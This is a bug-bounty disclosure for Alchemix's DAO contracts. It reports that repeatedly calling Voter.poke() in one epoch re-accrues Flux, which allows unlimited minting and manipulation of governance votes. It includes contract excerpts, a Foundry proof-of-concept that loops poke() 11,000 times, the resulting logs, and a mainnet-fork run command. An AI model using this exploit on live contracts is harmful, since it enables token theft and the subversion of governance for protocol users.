31149 - [SC - Critical] Manipulation of governance voting result by unl...

Manipulation of governance voting result by unlimited minting the Flux Token by repeatly call poke function

Submitted on May 13th 2024 at 16:06:32 UTC by @perseverance for Boost | Alchemix

Report ID: #31149

Report type: Smart Contract

Report severity: Critical

Target: https://github.com/alchemix-finance/alchemix-v2-dao/blob/main/src/FluxToken.sol

Impacts:

Manipulation of governance voting result deviating from voted outcome and resulting in a direct change from intended effect of original results

Description

Brief/Intro

Flux token implements a standard ERC20 token with extra features. Flux tokens are accrued by users of VotingEscrow when voting in the contract Voter. Flux tokens can be used to: i) exit a ve-position early by paying a penalty fee when calling function startCooldown, ii) boost voting power of a NFT holder in contract Voter, or iii) as a normal ERC20 token that can be traded in other systems.

So Flux tokens can be used to boost the voting power of a NFT holder. It is shown in the code of vote() function as below.

https://github.com/alchemix-finance/alchemix-v2-dao/blob/main/src/Voter.sol#L228C5-L233C6

function vote(
        uint256 _tokenId,
        address[] calldata _poolVote,
        uint256[] calldata _weights,
        uint256 _boost
    ) external onlyNewEpoch(_tokenId) { {

        // redacted for simplicity

    }
    _vote(_tokenId, _poolVote, _weights, _boost);

https://github.com/alchemix-finance/alchemix-v2-dao/blob/main/src/Voter.sol#L412-L455

function _vote(uint256 _tokenId, address[] memory _poolVote, uint256[] memory _weights, uint256 _boost) internal {
        
        
        // redacted for simplicity

        IFluxToken(FLUX).accrueFlux(_tokenId);
        uint256 totalPower = (IVotingEscrow(veALCX).balanceOfToken(_tokenId) + _boost);

    
        // redacted for simplicity
       
        // Update flux balance of token if boost was used
        if (_boost > 0) {
            IFluxToken(FLUX).updateFlux(_tokenId, _boost);
        }
    }

https://github.com/alchemix-finance/alchemix-v2-dao/blob/main/src/FluxToken.sol#L195-L199

    function updateFlux(uint256 _tokenId, uint256 _amount) external {
        require(msg.sender == voter, "not voter");
        require(_amount <= unclaimedFlux[_tokenId], "not enough flux");
        unclaimedFlux[_tokenId] -= _amount;
    }

So users can boost the voting power up to unclaimedFlux of the tokenId.

The unclaimedFlux[_tokenId] is updated in the function accrueFlux()

https://github.com/alchemix-finance/alchemix-v2-dao/blob/main/src/FluxToken.sol#L188C5-L192C6

function accrueFlux(uint256 _tokenId) external {
        require(msg.sender == voter, "not voter");
        uint256 amount = IVotingEscrow(veALCX).claimableFlux(_tokenId);
        unclaimedFlux[_tokenId] += amount;
    }

https://github.com/alchemix-finance/alchemix-v2-dao/blob/main/src/VotingEscrow.sol#L377-L385

function claimableFlux(uint256 _tokenId) public view returns (uint256) {
        // If the lock is expired, no flux is claimable at the current epoch
        if (block.timestamp > locked[_tokenId].end) {
            return 0;
        }

        // Amount of flux claimable is <fluxPerVeALCX> percent of the balance
        return (_balanceOfTokenAt(_tokenId, block.timestamp) * fluxPerVeALCX) / BPS;
    }

So according to the design of the Alchemix DAO system, if an user have a locked tokenID then with balanceA then the user can get maximum Fluxtoken for 1 epoch is

    _balanceOfTokenAt(_tokenId, block.timestamp)* fluxPerVeALCX) / BPS

The vulnerability

Vulnerability Details

Now an attacker can mint unlimited times of the amount of Flux Token for 1 epoch intended by the Alchemix DAO system by the using the same amount of capital.

So if an user have locked 10 * 10 ** 18 BPT token for 2 weeks, then the maximal amount of flux tokens can be claimed in 1 epoch is:

270057394723366387 = 270_057_394_723_366_387 = 270 e15 Flux token.

This amount here is just an example.

Attacker can manipulate the system to mint unlimited times of Flux token by exploiting the function poke() in Voter contract.

https://github.com/alchemix-finance/alchemix-v2-dao/blob/main/src/Voter.sol#L195-L212

    function poke(uint256 _tokenId) public {
        // Previous boost will be taken into account with weights being pulled from the votes mapping
        uint256 _boost = 0;

        if (msg.sender != admin) {
            require(IVotingEscrow(veALCX).isApprovedOrOwner(msg.sender, _tokenId), "not approved or owner");
        }

        address[] memory _poolVote = poolVote[_tokenId];
        uint256 _poolCnt = _poolVote.length;
        uint256[] memory _weights = new uint256[](_poolCnt);

        for (uint256 i = 0; i < _poolCnt; i++) {
            _weights[i] = votes[_tokenId][_poolVote[i]];
        }

        _vote(_tokenId, _poolVote, _weights, _boost);
    }

This function call will call _vote() internal function then call accrueFlux function of contract FluxToken

https://github.com/alchemix-finance/alchemix-v2-dao/blob/main/src/Voter.sol#L412-L423

function _vote(uint256 _tokenId, address[] memory _poolVote, uint256[] memory _weights, uint256 _boost) internal {
        
        // redacted for simplicity
        IFluxToken(FLUX).accrueFlux(_tokenId);

        // redacted for simplicity
    }

Since the attacker is the owner of tokenId so this is normal. This call will call accrueFlux function to update the unclaimedFlux for the tokenId.

https://github.com/alchemix-finance/alchemix-v2-dao/blob/main/src/FluxToken.sol#L188C5-L192C6

function accrueFlux(uint256 _tokenId) external {
        require(msg.sender == voter, "not voter");
        uint256 amount = IVotingEscrow(veALCX).claimableFlux(_tokenId);
        unclaimedFlux[_tokenId] += amount;
    }

Now this tokenId1 has the balanceTokenId1 => unclaimedFlux[_tokenId] += amount

Since the poke() function allows the owner of the tokenId to call this function unlimited times during the same EPOCH. Every time the poke() function is called, then the unclaimedFlux is added one more time.

        uint256 amount = IVotingEscrow(veALCX).claimableFlux(_tokenId);
        unclaimedFlux[_tokenId] += amount;

By repeatedly call poke() function, the attacker will get more Flux token unlimited times of the current intended amount. When have more flux token, the attacker can use it as boost to manipulate the system to manipulate governance.

Impacts

About the severity assessment

The impact is that the attacker will be able to exploit the system to get unlimited times bigger Flux token for the same capital.

Since the Flux tokens can be used to boost the Voting power in Vote function and can manipulate the governance voting result. The attacker can also mint Flux token to get benefit as the Flux token can be traded for other assets as stated by the protocol document.

The severity: Critial

Category:

Manipulation of governance voting result deviating from voted outcome and resulting in a direct change from intended effect of original results
Unauthorized or malicious minting of Flux token

Capital for the attack: Gas to execute the transactions. Amount of BPT can be small just to create lock position.

Easy to exploit and easy to be automated.

Please note that this bug is different from bug: Report 39030 (https://bugs.immunefi.com/dashboard/submission/39030) was reported by me. Because the bug 39030 describes the exploit using poke() and merge() function. The attack there is more complex and related to merge() functionality. For bug 39030, the attacker can mint only several times of the amount of Flux token.

This bug involves only exploit of poke() function. For this bug the attacker can mint unlimited amount of Flux token.

Proof of concept

testFluxAccrual_Poke_Hacked()

I created the POC for exploit scenario

The POC code:

function testFluxAccrual_Poke_Hacked() public {
        
        address attacker = address(this); 
        console2.log("Start to createLock with _maxLockEnabled is false and value is 1e18 BPT");

        uint256 tokenId1 = createVeAlcx(attacker, 10*TOKEN_1, 2 weeks, false);
                
        IVotingEscrow_1.LockedBalance memory _lock = IVotingEscrow_1(address(veALCX)).locked(tokenId1);
        console2.log("LockedBalance of tokenId1 lock.amount: %s  ", _lock.amount);
        console2.log("LockedBalance of tokenId1 _lock.end: %s  ", _lock.end);  
        console2.log("LockedBalance of tokenId1 _lock.cooldown: %s  ", _lock.end); 
        console2.log("LockedBalance of tokenId1 _lock.maxLockEnabled: %s  ", _lock.maxLockEnabled); 
        
        console2.log("Call voter.poke(tokenId1)");
        
        uint256 count = 11000; 

        for (uint256 i = 0; i < count; ++i)
        {
            voter.poke(tokenId1);                       
        
        }
        
        console2.log("After having unclaimFlux, attacker can use to boost voting power or mint Flux token"); 

        console2.log("Flux token balance of the attacker: %s",flux.balanceOf(attacker)); 
        console2.log("Call unclaimedFlux to mint Flux token for the attacker"); 
        uint256 unclaimedFlux = flux.getUnclaimedFlux(tokenId1);
        flux.claimFlux(tokenId1,unclaimedFlux); 
        console2.log("After claiming: Flux token balance of the attacker: %s",flux.balanceOf(attacker));

}

In this POC, I use 10 * 10**18 BPT token. The attacker create 10 tokenIds and repeately call poke(tokenId) and merge

The log shows:

[PASS] testFluxAccrual_Poke_Hacked() (gas: 175256241)
Logs:
  Start to createLock with _maxLockEnabled is false and value is 1e18 BPT
  LockedBalance of tokenId1 lock.amount: 10000000000000000000  
  LockedBalance of tokenId1 _lock.end: 1716422400  
  LockedBalance of tokenId1 _lock.cooldown: 1716422400  
  LockedBalance of tokenId1 _lock.maxLockEnabled: false  
  Call voter.poke(tokenId1)
  After having unclaimFlux, attacker can use to boost voting power or mint Flux token
  Flux token balance of the attacker: 0
  Call unclaimedFlux to mint Flux token for the attacker
  After claiming: Flux token balance of the attacker: 2970631341957030257000

So at the end of the attack: the attacker still have a tokenId with amount: 10000000000000000000 = 10 ** 18 Lock duration: 2 weeks.

So the attacker still can withdraw his capital of BPT token as normal.

The unclaimedFlux of tokenId1: 2970631341957030257000

testFluxAccrual_Poke_Normal()

I also created the normal scenario where a user lock 10 ** 10**18 BPT token.

function testFluxAccrual_Poke_Normal() public {
        
        address attacker = address(this); 
        console2.log("Start to createLock with _maxLockEnabled is false and value is 1e18 BPT");

        uint256 tokenId1 = createVeAlcx(attacker, 10*TOKEN_1, 2 weeks, false);
                
        IVotingEscrow_1.LockedBalance memory _lock = IVotingEscrow_1(address(veALCX)).locked(tokenId1);
        console2.log("LockedBalance of tokenId1 lock.amount: %s  ", _lock.amount);
        console2.log("LockedBalance of tokenId1 _lock.end: %s  ", _lock.end);  
        console2.log("LockedBalance of tokenId1 _lock.cooldown: %s  ", _lock.end); 
        console2.log("LockedBalance of tokenId1 _lock.maxLockEnabled: %s  ", _lock.maxLockEnabled); 
        
        console2.log("Call voter.poke(tokenId1)");          
        voter.poke(tokenId1);
        uint256 unclaimedFlux = flux.getUnclaimedFlux(tokenId1);
        console2.log("unclaimedFlux1: %s", unclaimedFlux);

        console2.log("After having unclaimFlux, attacker can use to boost voting power or mint Flux token"); 

        console2.log("Flux token balance of the attacker: %s",flux.balanceOf(attacker)); 
        console2.log("Call unclaimedFlux to mint Flux token for the attacker"); 
        flux.claimFlux(tokenId1,unclaimedFlux); 
        console2.log("After claiming: Flux token balance of the attacker: %s",flux.balanceOf(attacker));
             

    }

The log of this test case shows:


[PASS] testFluxAccrual_Poke_Normal() (gas: 1296670)
Logs:
  Start to createLock with _maxLockEnabled is false and value is 1e18 BPT
  LockedBalance of tokenId1 lock.amount: 10000000000000000000  
  LockedBalance of tokenId1 _lock.end: 1716422400  
  LockedBalance of tokenId1 _lock.cooldown: 1716422400  
  LockedBalance of tokenId1 _lock.maxLockEnabled: false  
  Call voter.poke(tokenId1)
  unclaimedFlux1: 270057394723366387
  After having unclaimFlux, attacker can use to boost voting power or mint Flux token
  Flux token balance of the attacker: 0
  Call unclaimedFlux to mint Flux token for the attacker
  After claiming: Flux token balance of the attacker: 270057394723366387

So the unclaimedFlux1 of the tokenID1 is 270057394723366387

To compare, the attacker get 11_000 times bigger that is the number of loops. So attackers can repeat this and get the unlimited token of Flux token.

2970631341957030257000  /  270057394723366387  = 11_000

So attacker can use the gained Flux token to boost the voting power. In this POC, I demonstrated that the attacker can mint Flux token.

   Flux token balance of the attacker: 0
  Call unclaimedFlux to mint Flux token for the attacker
  After claiming: Flux token balance of the attacker: 2970631341957030257000

Full POC Code:

To run the test Copy the test code into the file:

function testFluxAccrual_Poke_Hacked() public {
        
        address attacker = address(this); 
        console2.log("Start to createLock with _maxLockEnabled is false and value is 1e18 BPT");

        uint256 tokenId1 = createVeAlcx(attacker, 10*TOKEN_1, 2 weeks, false);
                
        IVotingEscrow_1.LockedBalance memory _lock = IVotingEscrow_1(address(veALCX)).locked(tokenId1);
        console2.log("LockedBalance of tokenId1 lock.amount: %s  ", _lock.amount);
        console2.log("LockedBalance of tokenId1 _lock.end: %s  ", _lock.end);  
        console2.log("LockedBalance of tokenId1 _lock.cooldown: %s  ", _lock.end); 
        console2.log("LockedBalance of tokenId1 _lock.maxLockEnabled: %s  ", _lock.maxLockEnabled); 
        
        console2.log("Call voter.poke(tokenId1)");
        
        uint256 count = 11000; 

        for (uint256 i = 0; i < count; ++i)
        {
            voter.poke(tokenId1);                       
        
        }
        
        console2.log("After having unclaimFlux, attacker can use to boost voting power or mint Flux token"); 

        console2.log("Flux token balance of the attacker: %s",flux.balanceOf(attacker)); 
        console2.log("Call unclaimedFlux to mint Flux token for the attacker"); 
        uint256 unclaimedFlux = flux.getUnclaimedFlux(tokenId1);
        flux.claimFlux(tokenId1,unclaimedFlux); 
        console2.log("After claiming: Flux token balance of the attacker: %s",flux.balanceOf(attacker));

    }

    function testFluxAccrual_Poke_Normal() public {
        
        address attacker = address(this); 
        console2.log("Start to createLock with _maxLockEnabled is false and value is 1e18 BPT");

        uint256 tokenId1 = createVeAlcx(attacker, 10*TOKEN_1, 2 weeks, false);
                
        IVotingEscrow_1.LockedBalance memory _lock = IVotingEscrow_1(address(veALCX)).locked(tokenId1);
        console2.log("LockedBalance of tokenId1 lock.amount: %s  ", _lock.amount);
        console2.log("LockedBalance of tokenId1 _lock.end: %s  ", _lock.end);  
        console2.log("LockedBalance of tokenId1 _lock.cooldown: %s  ", _lock.end); 
        console2.log("LockedBalance of tokenId1 _lock.maxLockEnabled: %s  ", _lock.maxLockEnabled); 
        
        console2.log("Call voter.poke(tokenId1)");          
        voter.poke(tokenId1);
        uint256 unclaimedFlux = flux.getUnclaimedFlux(tokenId1);
        console2.log("unclaimedFlux1: %s", unclaimedFlux);

        console2.log("After having unclaimFlux, attacker can use to boost voting power or mint Flux token"); 

        console2.log("Flux token balance of the attacker: %s",flux.balanceOf(attacker)); 
        console2.log("Call unclaimedFlux to mint Flux token for the attacker"); 
        flux.claimFlux(tokenId1,unclaimedFlux); 
        console2.log("After claiming: Flux token balance of the attacker: %s",flux.balanceOf(attacker));
             

    }

}

https://github.com/alchemix-finance/alchemix-v2-dao/blob/main/src/test/VotingEscrow.t.sol

and run the test command for the function in the alchemix-v2-dao folder:

FOUNDRY_PROFILE=default forge test --fork-url https://rpc.ankr.com/eth --match-path src/test/VotingEscrow.t.sol --match-test testFluxAccrual_Poke  --fork-block-number 19858400 -vvvvv | format > testFluxAccrual_Poke_240513_1000.log

Logs

The full log: https://drive.google.com/file/d/1rVgRlD_C4NYKynFeBBv-YcVG8G90q-Fc/view?usp=sharing
The full log file with debug:

https://drive.google.com/file/d/1BGhCmiM-gADnQcNgvfbnDVhbDrs7oIAN/view?usp=sharing

Previous31141 - [SC - Critical] Permanent freezing of unclaimed yield of reward...Next31151 - [SC - Medium] Delegation Saturation Leading to Asset Freezing...

Last updated 1 year ago

Was this helpful?